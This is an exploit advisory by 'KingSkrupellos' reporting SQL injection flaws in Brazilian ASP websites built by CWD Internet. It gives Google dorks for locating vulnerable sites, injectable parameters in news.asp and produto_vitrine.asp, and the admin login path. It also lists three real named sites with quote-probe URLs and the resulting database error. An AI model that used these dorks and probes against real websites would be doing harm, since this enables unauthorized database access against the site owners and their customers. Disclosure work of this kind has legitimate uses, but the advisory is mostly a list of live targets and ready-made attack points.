#################################################################################################
# Exploit Title : Desenvolvido e Hospedado por CWD Internet Brazil SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 05/06/2018
# Vendor Homepage : cwd.com.br
# Tested On : Windows / Kali Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89
#################################################################################################
# Title : Copyright © CWD Internet 2012, Todos os direitos reservados - Uma empresa do Grupo Controlp.Com.Br Web Solution Systems
# Google Dork 1 : intext:''Desenvolvido e Hospedado por CWD Internet''
# Google Dork 2 : inurl:''/news.asp?tipo=T&offset=''
# Exploit : /news.asp?tipo=T&offset=[SQL Injection]
# Exploit : /produto_vitrine.asp?fabricante=[SQL Injection]
# Exploit : /produto_vitrine.asp?categoria=[SQL Injection]
# Admin Login Path => /restrito.asp
#################################################################################################
# Example Site => sanseicomercial.com.br/produto_vitrine.asp?categoria=53%27 => [ Proof of Concept ] => archive.is/T1Wwq
# Example Site => rotaxmotoclube.org.br/news.asp?tipo=1%27 => [ Proof of Concept ] => archive.is/ijSQJ
# Example Site => 7lobos.com.br/produto_vitrine.asp?fabricante=194%27 => [ Proof of Concept ] => archive.is/Odbkf
# SQL-DB Error =>
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'produtos.fabricante = fornecedor.cod and produtos.categoria =
categoria.cod and produtos.categoria = 53' order by fornecedor.fabricante'.
/produto_vitrine.asp, line 52
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################